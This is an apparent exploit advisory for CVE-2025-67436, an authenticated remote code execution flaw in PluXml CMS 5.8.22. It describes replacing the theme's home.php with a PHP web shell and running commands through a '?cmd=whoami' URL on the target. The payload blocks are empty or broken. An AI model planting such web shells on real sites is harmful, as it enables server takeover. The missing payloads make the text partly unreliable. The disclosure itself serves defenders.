## https://sploitus.com/exploit?id=FA11C50B-7B46-54E3-838A-CBC1BCB509FD
# CVE-2025-67436
## Authenticated Remote Code Execution (RCE) in PluXml CMS 5.8.22
#### Researcher : Chowdhury Faizal Ahammed
### Installation
```bash
git clone https://github.com/pluxml/PluXml.git
cd PluXml
ddev config --project-type=php --php-version=8.1 --docroot=.
ddev start
```
## Proof of Concept
**Step-by-Step Exploitation**
Authentication: Log in to the PluXML administrator panel with valid administrator credentials
Navigate to Theme Editor:
Access the administration dashboard
Navigate to: Themes โ Home.php โ Edit
Inject Malicious Payload:
- Replace the existing content in home.php with a PHP web shell
- Example payload: ``
- Save the modified file
Trigger Execution:
Visit the main home page of the website
The injected PHP code executes with web server privileges
- Remote commands can be executed via: http://target.com/?cmd=whoami
**Reverse Shell**
Payload of webshell
```html
">
```
## References
- **CVE-2025-67436**: [https://nvd.nist.gov/vuln/detail/CVE-2025-67436](https://nvd.nist.gov/vuln/detail/CVE-2025-67436)
- **PluXML Official Website**: [https://www.pluxml.org/](https://www.pluxml.org/)
- **PluXML GitHub Repository**: [https://github.com/pluxml/PluXml](https://github.com/pluxml/PluXml)
- **OWASP Top 10 - A03:2021 Injection**: [https://owasp.org/Top10/A03_2021-Injection/](https://owasp.org/Top10/A03_2021-Injection/)